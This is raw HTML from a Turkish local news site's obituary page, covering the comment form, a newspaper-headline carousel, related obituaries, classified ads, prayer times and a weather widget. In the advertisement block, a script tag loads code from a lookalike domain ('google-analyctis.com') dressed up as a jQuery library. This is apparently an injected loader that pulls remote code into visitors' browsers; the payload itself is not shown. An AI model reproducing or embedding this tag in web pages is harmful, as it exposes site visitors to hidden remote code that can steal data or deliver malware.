onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(68407);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="68407" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="d1e3d5e85a3fcfbe829477f03881520df6161d6d" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/vefatlar/necib-sinan-92-yasinda-h68407.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <div class="gazeteler"> <div id="carousel-gazeteler" class="carousel gazeteler slide"> <div class="box header black"> <h5 class="glyphicons bookmark" style="text-align:left;">GAZETE MANŞETLERİ</h5> <!-- <div class="pull-right"> <ol class="carousel-indicators"> <li data-target="#carousel-gazeteler" data-slide-to="0" class="active"></li> <li data-target="#carousel-gazeteler" data-slide-to="1"></li> <li data-target="#carousel-gazeteler" data-slide-to="2"></li> <li data-target="#carousel-gazeteler" data-slide-to="3"></li> <li data-target="#carousel-gazeteler" data-slide-to="4"></li> <li data-target="#carousel-gazeteler" data-slide-to="5"></li> <li data-target="#carousel-gazeteler" data-slide-to="6"></li> </ol> </div> --> </div> <div class="box content"> <div class="carousel-inner"> <div class="item active"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/aksam" title="Akşam" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/aksam.jpg" alt="Akşam"/></div> <p>Akşam</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/dirilis-postasi" title="Diriliş Postası" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/dirilis-postasi.jpg" alt="Diriliş Postası"/></div> <p>Diriliş Postası</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dunya" title="Dünya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/dunya.jpg" alt="Dünya"/></div> <p>Dünya</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dogru-haber" title="Doğru Haber" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/dogru-haber.jpg" alt="Doğru Haber"/></div> <p>Doğru Haber</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/gunes" title="Güneş" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/gunes.jpg" alt="Güneş"/></div> <p>Güneş</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/harbi-gazete" title="Harbi Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/harbi-gazete.jpg" alt="Harbi Gazete"/></div> <p>Harbi Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/karar" title="Karar" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/karar.jpg" alt="Karar"/></div> <p>Karar</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/korkusuz" title="Korkusuz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/korkusuz.jpg" alt="Korkusuz"/></div> <p>Korkusuz</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/ortadogu" title="Ortadoğu" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/ortadogu.jpg" alt="Ortadoğu"/></div> <p>Ortadoğu</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milli-gazete" title="Milli Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/milli-gazete.jpg" alt="Milli Gazete"/></div> <p>Milli Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/sozcu" title="Sözcü" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/sozcu.jpg" alt="Sözcü"/></div> <p>Sözcü</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/star" title="Star" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/star.jpg" alt="Star"/></div> <p>Star</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkiye" title="Türkiye" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/turkiye.jpg" alt="Türkiye"/></div> <p>Türkiye</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkgun" title="Türkgün" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/turkgun.jpg" alt="Türkgün"/></div> <p>Türkgün</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-akit" title="Yeni Akit" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/yeni-akit.jpg" alt="Yeni Akit"/></div> <p>Yeni Akit</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-asya" title="Yeni Asya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/yeni-asya.jpg" alt="Yeni Asya"/></div> <p>Yeni Asya</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-birlik" title="Yeni Birlik" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/yeni-birlik.jpg" alt="Yeni Birlik"/></div> <p>Yeni Birlik</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yenicag" title="Yeniçağ" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/yenicag.jpg" alt="Yeniçağ"/></div> <p>Yeniçağ</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yenisoz" title="Yenisöz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/yenisoz.jpg" alt="Yenisöz"/></div> <p>Yenisöz</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-safak" title="Yeni Şafak" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/yeni-safak.jpg" alt="Yeni Şafak"/></div> <p>Yeni Şafak</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milat" title="Milat" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-11-19//thumbs-150/milat.jpg" alt="Milat"/></div> <p>Milat</p> </a> </div> </div> </div> </div> <a class="fl_ carousel-control left" href="#carousel-gazeteler" data-slide="prev">&lsaquo;</a> <a class="fl_ carousel-control right" href="#carousel-gazeteler" data-slide="next">&rsaquo;</a> </div> </div> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/ali-dogan-84-yasinda-h68414.html" title="Ali Doğan 84 yaşında,"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/ali_dogan_84_yasinda_h68414_60be3.jpg" alt="Ali Doğan 84 yaşında," /> <span>Ali Doğan 84 yaşında,</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/hasbi-ozdemir-74-yasinda-h68408.html" title="Hasbi Özdemir 74 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/hasbi_ozdemir_74_yasinda_h68408_922ab.jpg" alt="Hasbi Özdemir 74 yaşında" /> <span>Hasbi Özdemir 74 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/gunnur-aksoy-46-yasinda-h68406.html" title="Günnur Aksoy 46 yaşında,"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/gunnur_aksoy_46_yasinda_h68406_6395e.jpg" alt="Günnur Aksoy 46 yaşında," /> <span>Günnur Aksoy 46 yaşında,</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/anma-yunus-emre-ozturk-h68405.html" title="Anma / Yunus Emre Öztürk"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/anma_yunus_emre_ozturk_h68405_cccd2.jpg" alt="Anma / Yunus Emre Öztürk" /> <span>Anma / Yunus Emre Öztürk</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/mevlit-bostanci-h68403.html" title="Mevlit Bostancı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/mevlit_bostanci_h68403_d4ca2.jpeg" alt="Mevlit Bostancı" /> <span>Mevlit Bostancı</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/bayram-polat-52-yasinda-h68400.html" title="Bayram Polat 52 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/bayram_polat_52_yasinda_h68400_1becc.jpg" alt="Bayram Polat 52 yaşında" /> <span>Bayram Polat 52 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/fatma-dogan-99-yasinda-h68394.html" title="Fatma Doğan (99 yaşında)"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/fatma_dogan_99_yasinda_h68394_d74ea.jpg" alt="Fatma Doğan (99 yaşında)" /> <span>Fatma Doğan (99 yaşında)</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-ismet-karaca-h68393.html" title="Vefat - Teşekkür / İsmet KARACA"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/vefat_tesekkur_ismet_karaca_h68393_b7efe.jpg" alt="Vefat - Teşekkür / İsmet KARACA" /> <span>Vefat - Teşekkür / İsmet KARACA</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-kiralik-daire-31-dogalgazli-13344.html" title="Battalgazi kiralık daire 3+1 doğalgazlı" >Battalgazi kiralık daire 3+1 doğalgazlı</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-kiralik-daire-31-dogalgazli-13344.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Battalgazi kiralık daire 3+1 doğalgazlı" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kaynak-yapi-market-13341.html" title="KAYNAK YAPI MARKET" >KAYNAK YAPI MARKET</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kaynak-yapi-market-13341.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KAYNAK YAPI MARKET" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/tarih-ve-cografya-ozel-ders-verilir-13340.html" title="Tarih ve Coğrafya Özel Ders verilir" >Tarih ve Coğrafya Özel Ders verilir</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/tarih-ve-cografya-ozel-ders-verilir-13340.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Tarih ve Coğrafya Özel Ders verilir" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ozel-ders-verilir-13338.html" title="ÖZEL DERS VERİLİR" >ÖZEL DERS VERİLİR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ozel-ders-verilir-13338.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ÖZEL DERS VERİLİR" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/cezaevi-uzeri-kiralik-daire-13334.html" title="CEZAEVİ ÜZERİ KİRALIK DAİRE" >CEZAEVİ ÜZERİ KİRALIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/cezaevi-uzeri-kiralik-daire-13334.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="CEZAEVİ ÜZERİ KİRALIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13318.html" title="BAYAN ELEMAN" >BAYAN ELEMAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13318.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/2f58456dfbf14c248df3b6293ec337ef37902fdb.jpg" alt="BAYAN ELEMAN" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/fen-bilgisi-ozel-ders-13315.html" title="Fen bilgisi özel ders" >Fen bilgisi özel ders</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/fen-bilgisi-ozel-ders-13315.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/307df56cc116cbda70a34a9937e948c136f9109c.jpg" alt="Fen bilgisi özel ders" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/site-tasarimi-yapilir-13312.html" title="Site tasarımı yapılır" >Site tasarımı yapılır</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/site-tasarimi-yapilir-13312.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/e012e2b9cc72183279ce8e510f08af9ed855f92d.jpg" alt="Site tasarımı yapılır" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sekili-sobali-kiralik-ev-13311.html" title="Sekili sobalı kiralık ev" >Sekili sobalı kiralık ev</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sekili-sobali-kiralik-ev-13311.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/5457c6d47657ba0004e8cf4936f615d49ed8dac6.jpg" alt="Sekili sobalı kiralık ev" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-mustakil-ev-13308.html" title="Kiralık Müstakil ev" >Kiralık Müstakil ev</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-mustakil-ev-13308.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralık Müstakil ev" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-kiralik-daire-13306.html" title="SAHİBİNDEN KIRALIK DAİRE" >SAHİBİNDEN KIRALIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-kiralik-daire-13306.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/4fe78af3713d18835cbeb1423d3233c1ce880120.jpg" alt="SAHİBİNDEN KIRALIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/devren-satlik-is-yeri-13299.html" title="Devren satlık iş yeri" >Devren satlık iş yeri</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/devren-satlik-is-yeri-13299.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Devren satlık iş yeri" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/karelbistanda-satilik-arsa-13298.html" title="Karelbistanda satılık arsa" >Karelbistanda satılık arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/karelbistanda-satilik-arsa-13298.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/a3a647bf6b531101e656125160c503589912f9b9.jpg" alt="Karelbistanda satılık arsa" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/eleman-araniyor-13293.html" title="ELEMAN ARANIYOR" >ELEMAN ARANIYOR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/eleman-araniyor-13293.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ELEMAN ARANIYOR" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-ev-ve-bahce-13292.html" title="SATILIK EV VE BAHÇE" >SATILIK EV VE BAHÇE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-ev-ve-bahce-13292.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK EV VE BAHÇE" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="https://facebook.com/elbistaninsesi" target="blank" id="likes">40B</a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="https://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="https://twitter.com/elbistaninsesi" target="blank" id="followers">98</a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="https://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>05:45</td> <td>07:09</td> <td>12:23</td> <td>15:03</td> <td>17:26</td> <td>18:45</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/kardes-kavgasinda-kan-akti-1-olu-h68390.html" title="Kardeş kavgasında kan aktı: 1 ölü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/kardes_kavgasinda_kan_akti_1_olu_h68390_20687.jpg" alt="Kardeş kavgasında kan aktı: 1 ölü" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kardes-kavgasinda-kan-akti-1-olu-h68390.html" title="" ><span class="en-hit">1.</span> <strong>Kardeş kavgasında kan aktı: 1 ölü</strong> <span class="en-spot en-hidden">Elbistan’da tartıştığı ağabeyi tarafından bıçaklandığı belirtilen...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/11-kilometrelik-dev-kanalin-yapimina-baslandi-h68167.html" title="11 kilometrelik dev kanalın yapımına..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/11_kilometrelik_dev_kanalin_yapimina_baslandi_h68167_a4f93.jpg" alt="11 kilometrelik dev kanalın yapımına..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/11-kilometrelik-dev-kanalin-yapimina-baslandi-h68167.html" title="" ><span class="en-hit">2.</span> <strong>11 kilometrelik dev kanalın yapımına...</strong> <span class="en-spot en-hidden">Elektrik Üretim Anonim Şirketi (EÜAŞ) tarafından E Sektörünün...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/afsinli-ciftci-polar-oraninda-rekor-kirdi-h68294.html" title="Afşinli çiftçi, polar oranında..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/afsinli_ciftci_polar_oraninda_rekor_kirdi_h68294_cd67d.jpg" alt="Afşinli çiftçi, polar oranında..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/afsinli-ciftci-polar-oraninda-rekor-kirdi-h68294.html" title="" ><span class="en-hit">3.</span> <strong>Afşinli çiftçi, polar oranında...</strong> <span class="en-spot en-hidden">Afşin ilçesine bağlı Kabaağaç Mahallesi’nde 30 yıldır çiftçilik...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/esini-vurup-ayni-silahla-yasamina-son-verdi-h68231.html" title="Eşini vurup aynı silahla yaşamına..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/esini_vurup_ayni_silahla_yasamina_son_verdi_h68231_c5a66.jpg" alt="Eşini vurup aynı silahla yaşamına..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/esini-vurup-ayni-silahla-yasamina-son-verdi-h68231.html" title="" ><span class="en-hit">4.</span> <strong>Eşini vurup aynı silahla yaşamına...</strong> <span class="en-spot en-hidden">Elbistan&#039;da psikolojik sorunları olduğu öğrenilen 61 yaşındaki...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/oglunun-kazara-atesledigi-tufek-annesini-hayattan-kopardi-h68140.html" title="Oğlunun kazara ateşlediği tüfek,..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/oglunun_kazara_atesledigi_tufek_annesini_hayattan_kopardi_h68140_626e3.jpg" alt="Oğlunun kazara ateşlediği tüfek,..." ></a><div class="en-right"><a 